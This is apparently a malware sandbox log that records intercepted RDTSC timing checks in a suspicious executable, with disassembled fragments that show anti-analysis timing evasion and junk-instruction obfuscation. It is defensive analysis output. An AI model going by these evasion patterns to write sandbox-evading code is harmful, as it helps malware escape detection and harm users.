                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C034E second address: 52C03FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov di, cx 0x0000000f mov di, ax 0x00000012 popad 0x00000013 jmp 00007F8481503874h 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b mov bx, 9254h 0x0000001f pushfd 0x00000020 jmp 00007F848150386Dh 0x00000025 add eax, 156A5516h 0x0000002b jmp 00007F8481503871h 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ebp 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F848150386Ch 0x0000003a or al, 00000038h 0x0000003d jmp 00007F848150386Bh 0x00000042 popfd 0x00000043 call 00007F8481503878h 0x00000048 push eax 0x00000049 pop edi 0x0000004a pop esi 0x0000004b popad 0x0000004c mov ebp, esp 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F8481503878h 0x00000055 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C03FE second address: 52C0404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0404 second address: 52C0408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53005AF second address: 53005B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53005B5 second address: 53005D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F848150386Ah 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov dl, ah 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53005D0 second address: 53005D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53005D4 second address: 5300613 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F848150386Ch 0x00000010 sbb si, D808h 0x00000015 jmp 00007F848150386Bh 0x0000001a popfd 0x0000001b mov si, DE7Fh 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F848150386Ch 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300613 second address: 5300622 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300622 second address: 5300628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300628 second address: 530062C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E02B0 second address: 52E02B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E02B4 second address: 52E02D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E02D1 second address: 52E0325 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F8481503877h 0x00000010 movzx ecx, bx 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F848150386Bh 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F8481503870h 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0325 second address: 52E0329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0329 second address: 52E032F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E032F second address: 52E0340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F848074392Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0E28 second address: 52D0E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E012F second address: 52E0135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0135 second address: 52E014F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E014F second address: 52E0153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0153 second address: 52E0159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0159 second address: 52E015F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E015F second address: 52E0163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0163 second address: 52E0187 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0187 second address: 52E018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E018B second address: 52E0191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0191 second address: 52E01AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8481503879h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E01AE second address: 52E01BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E01BE second address: 52E01C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E01C2 second address: 52E01D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743932h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E01D8 second address: 52E01F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push esi 0x0000000c mov ebx, 16295D16h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0D32 second address: 52F0D38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0D38 second address: 52F0D5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F848150386Ah 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0D5B second address: 52F0D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0D61 second address: 52F0D72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F848150386Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0D72 second address: 52F0DCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F848074392Eh 0x00000012 xchg eax, ecx 0x00000013 jmp 00007F8480743930h 0x00000018 push eax 0x00000019 jmp 00007F848074392Bh 0x0000001e xchg eax, ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F8480743935h 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0DCE second address: 52F0DEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76FA65FCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0DEE second address: 52F0DF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0DF4 second address: 52F0DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0DFA second address: 52F0DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0DFE second address: 52F0E24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f push eax 0x00000010 pop edi 0x00000011 pop esi 0x00000012 popad 0x00000013 je 00007F84F31363B4h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0E24 second address: 52F0E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0E28 second address: 52F0E2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0E2E second address: 52F0E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743932h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0E44 second address: 52F0E95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov si, di 0x00000013 pushfd 0x00000014 jmp 00007F8481503877h 0x00000019 sub cx, 00EEh 0x0000001e jmp 00007F8481503879h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0E95 second address: 52F0EEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8480743937h 0x00000009 xor cx, 26FEh 0x0000000e jmp 00007F8480743939h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xor eax, dword ptr [ebp+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F8480743936h 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0EEF second address: 52F0F70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov edi, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 1Fh 0x0000000e jmp 00007F8481503874h 0x00000013 ror eax, cl 0x00000015 pushad 0x00000016 movzx eax, bx 0x00000019 pushfd 0x0000001a jmp 00007F8481503873h 0x0000001f and eax, 70D1A3CEh 0x00000025 jmp 00007F8481503879h 0x0000002a popfd 0x0000002b popad 0x0000002c leave 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F848150386Ch 0x00000034 or ecx, 0DB50448h 0x0000003a jmp 00007F848150386Bh 0x0000003f popfd 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0F70 second address: 5300037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, cx 0x00000007 popad 0x00000008 popad 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [00722014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007F84853547E2h 0x00000024 push FFFFFFFEh 0x00000026 pushad 0x00000027 mov edi, ecx 0x00000029 jmp 00007F8480743938h 0x0000002e popad 0x0000002f pop eax 0x00000030 jmp 00007F8480743930h 0x00000035 ret 0x00000036 nop 0x00000037 push eax 0x00000038 call 00007F848536385Fh 0x0000003d mov edi, edi 0x0000003f jmp 00007F8480743930h 0x00000044 xchg eax, ebp 0x00000045 jmp 00007F8480743930h 0x0000004a push eax 0x0000004b jmp 00007F848074392Bh 0x00000050 xchg eax, ebp 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 mov si, 16F1h 0x00000058 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300037 second address: 5300071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, 53F3h 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F8481503871h 0x00000016 sbb ecx, 07740436h 0x0000001c jmp 00007F8481503871h 0x00000021 popfd 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300071 second address: 53000AE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8480743930h 0x00000008 adc al, 00000058h 0x0000000b jmp 00007F848074392Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8480743935h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B000A second address: 52B0032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8481503877h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0032 second address: 52B009C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 movsx ebx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8480743933h 0x00000013 xor ax, 790Eh 0x00000018 jmp 00007F8480743939h 0x0000001d popfd 0x0000001e mov di, cx 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F848074392Ah 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F8480743937h 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B009C second address: 52B00B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8481503874h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B00B4 second address: 52B00F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e pushad 0x0000000f mov al, AEh 0x00000011 push edx 0x00000012 mov dl, ah 0x00000014 pop edi 0x00000015 popad 0x00000016 xchg eax, ecx 0x00000017 pushad 0x00000018 mov cx, 9651h 0x0000001c mov cx, 468Dh 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F8480743936h 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B00F4 second address: 52B00FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B00FA second address: 52B0116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov esi, 23734AD9h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0116 second address: 52B0167 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8481503876h 0x00000008 sub cl, 00000068h 0x0000000b jmp 00007F848150386Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov di, si 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 push ebx 0x0000001a mov ch, F3h 0x0000001c pop ebx 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F8481503877h 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0167 second address: 52B016D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B016D second address: 52B0173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0173 second address: 52B0177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0177 second address: 52B017B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B017B second address: 52B019F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8480743939h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B019F second address: 52B01A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B01A5 second address: 52B01A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B01A9 second address: 52B01BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B01BA second address: 52B01BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B01BE second address: 52B01C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B01C2 second address: 52B01C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B01C8 second address: 52B01CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B01CE second address: 52B01D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B01D2 second address: 52B0209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov edx, esi 0x0000000c mov dx, si 0x0000000f popad 0x00000010 mov dword ptr [esp], esi 0x00000013 pushad 0x00000014 movzx ecx, di 0x00000017 jmp 00007F848150386Dh 0x0000001c popad 0x0000001d mov esi, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F848150386Dh 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0209 second address: 52B026A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8480743937h 0x00000009 add eax, 66CC223Eh 0x0000000f jmp 00007F8480743939h 0x00000014 popfd 0x00000015 mov esi, 36AD4987h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, edi 0x0000001e jmp 00007F848074392Ah 0x00000023 push eax 0x00000024 jmp 00007F848074392Bh 0x00000029 xchg eax, edi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B026A second address: 52B026E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B026E second address: 52B0274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0274 second address: 52B02C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007F8481503874h 0x00000018 popad 0x00000019 je 00007F84F3171BDFh 0x0000001f jmp 00007F8481503870h 0x00000024 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F848150386Ah 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B02C7 second address: 52B02CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B02CD second address: 52B0329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F84F3171BB2h 0x0000000f pushad 0x00000010 pushad 0x00000011 mov cx, C6A3h 0x00000015 mov edx, eax 0x00000017 popad 0x00000018 call 00007F8481503874h 0x0000001d pushad 0x0000001e popad 0x0000001f pop esi 0x00000020 popad 0x00000021 mov edx, dword ptr [esi+44h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F8481503878h 0x0000002c mov ax, E0E1h 0x00000030 popad 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0329 second address: 52B034D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B034D second address: 52B0351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0351 second address: 52B0357 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
